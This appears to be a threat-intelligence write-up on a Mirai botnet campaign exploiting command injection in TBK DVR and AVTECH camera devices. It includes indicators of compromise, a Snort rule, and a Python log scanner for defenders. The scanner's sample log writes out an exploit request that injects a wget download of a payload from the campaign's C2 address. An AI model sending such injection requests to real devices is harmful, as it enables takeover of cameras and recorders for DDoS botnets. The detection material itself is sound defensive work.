
A new variant of the Mirai botnet is actively exploiting a command injection vulnerability (CVE-2024-3721) in TBK DVR-4104 and DVR-4216 devices, according to recent reports from Kaspersky and Akamai [1][2]. The campaign has infected over 50,000 devices across China, India, Egypt, and other regions, leveraging unpatched firmware to deploy ARM32 payloads for DDoS attacks.
Technical Analysis of the Exploit
The attackers exploit CVE-2024-3721 by sending a crafted HTTP POST request to the `/device.rsp` endpoint with a command injection payload. The vulnerability allows execution of arbitrary shell commands via the `___S_O_S_T_R_E_A_MAX___` parameter [1]. The malware then downloads a binary (`arm7`) from the C2 server at `42.112.26[.]36` and executes it with elevated permissions. Kaspersky’s analysis reveals the payload uses RC4 encryption with a static key (`6e7976666525a97639777d2d7f303177`) and includes anti-analysis checks for VMware/QEMU environments [1].
Akamai’s research notes a parallel campaign targeting AVTECH IP cameras (CVE-2024-7029) with a COVID-19-themed Mirai variant dubbed “Corona Mirai” [2]. This exploit chain uses a GET request to the `/cgi-bin/supervisor/Factory.cgi` endpoint, injecting commands via the `brightness` parameter to fetch a secondary payload (`boatnet.arm7`).
Indicators of Compromise (IoCs)
| Type | Value | Source |
|---|---|---|
| IPs | 42.112.26[.]36, 176.65.144[.]253 | Kaspersky, Akamai |
| Domains | tcpdown[.]su, connect.antiwifi.dev | Akamai |
| SHA256 | f05247a2322e212513ee08b2e8513f4c… | Akamai YARA rules |
Mitigation Strategies
Organizations using affected TBK DVR devices should:
- Immediately block traffic to the IoCs listed above
- Monitor for anomalous HTTP requests to `/device.rsp` and `/cgi-bin/supervisor/Factory.cgi`
- Replace end-of-life devices lacking vendor patches
For network defenders, Akamai recommends deploying Snort rules to detect C2 communication [2]:
# Snort rule header needs source address AND source port before the direction operator ("any any ->")
alert ip any any -> [176.65.144.253] any (msg:"Corona Mirai C2"; sid:1000001; rev:1;)
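The monitoring step above, as an added example in Python that is not code from the article or from the cited reports: a small access-log scanner that flags requests to the two named endpoints when they carry the TBK injection parameter or shell metacharacters in a parameter value, and any request that references the listed IoC hosts. The common/combined log format, the `opt=sys` field and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus
# Injection endpoints named in the article (TBK DVR, then AVTECH camera).
WATCHED_PATHS = {"/device.rsp", "/cgi-bin/supervisor/Factory.cgi"}
# The TBK parameter is suspicious by itself; AVTECH's legitimate brightness
# parameter is flagged only when its value carries shell metacharacters.
INJECTION_PARAMS = {"___S_O_S_T_R_E_A_MAX___"}
SHELL_META = re.compile(r"[;|`&]|\$\(")
# Network IoCs from the article's table, with defanging brackets removed.
IOC_HOSTS = ("42.112.26.36", "176.65.144.253", "tcpdown.su", "connect.antiwifi.dev")
# Common/combined access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" \d{3}')

def classify_request(url):
    """Return the reasons a request URL matches this campaign (empty if clean)."""
    parts = urlsplit(url)
    path = unquote_plus(parts.path)
    reasons = []
    if path in WATCHED_PATHS:
        # Decode each field separately: encoded metacharacters are seen, '&' separators are not.
        for field in parts.query.split("&"):
            name, _, value = field.partition("=")
            name, value = unquote_plus(name), unquote_plus(value)
            if name in INJECTION_PARAMS:
                reasons.append("injection parameter %s on %s" % (name, path))
            if SHELL_META.search(value):
                reasons.append("shell metacharacter in %s on %s" % (name, path))
    decoded = unquote_plus(url)
    for host in IOC_HOSTS:
        if host in decoded:
            reasons.append("known IoC host " + host)
    return reasons

def scan_log(text):
    """Return (client, url, reasons) for every access-log line that is flagged."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        reasons = classify_request(m.group("url")) if m else []
        if reasons:
            hits.append((m.group("src"), m.group("url"), reasons))
    return hits

# Constructed sample log (not real traffic): two exploit attempts, one normal
# brightness query and one unrelated request.
SAMPLE_LOG = """\
198.51.100.7 - - [06/Jun/2025:10:00:01 +0000] "POST /device.rsp?opt=sys&___S_O_S_T_R_E_A_MAX___=%3Bwget+http%3A%2F%2F42.112.26.36%2Farm7 HTTP/1.1" 200 12
198.51.100.8 - - [06/Jun/2025:10:00:02 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=set&brightness=1%3B%60echo+x%60 HTTP/1.1" 200 0
198.51.100.9 - - [06/Jun/2025:10:00:03 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=get&brightness=50 HTTP/1.1" 200 0
198.51.100.10 - - [06/Jun/2025:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 512
"""
```

Run `scan_log(SAMPLE_LOG)` to see the first two lines flagged (with three and one reasons respectively) while the legitimate brightness query and the unrelated request pass.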
Broader Implications
This campaign highlights the persistent threat of IoT botnets exploiting known vulnerabilities in rebranded devices. NetmanageIT’s analysis indicates 60% of infections occur in Asia, with TBK devices often sold under alternate brands like “Novo” [4]. CISA has issued advisories for critical infrastructure operators to segment vulnerable devices [3].
The Mirai variant’s multi-architecture support (ARM/MIPS/x86) and use of historical exploits like CVE-2017-17215 demonstrate the botnet’s continued evolution. Public exploit code for related vulnerabilities has been available since 2019, lowering the barrier for entry [4].
Conclusion
The TBK DVR exploitation underscores the need for rigorous patch management of IoT devices, particularly in critical infrastructure. Security teams should prioritize monitoring for the documented IoCs and consider network segmentation for vulnerable devices. The Mirai botnet’s adaptability to new vulnerabilities ensures it remains a persistent threat in 2025.
References
- [1] “Mirai variant targets TBK DVR devices via CVE-2024-3721,” Kaspersky Securelist, Jun. 6, 2025.
- [2] “Corona Mirai botnet infects zero-day,” Akamai SIRT, Aug. 28, 2024.
- [3] “Censys Advisory: CVE-2024-7029,” Censys, 2024.
- [4] “Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721,” NetmanageIT OpenCTI, 2025.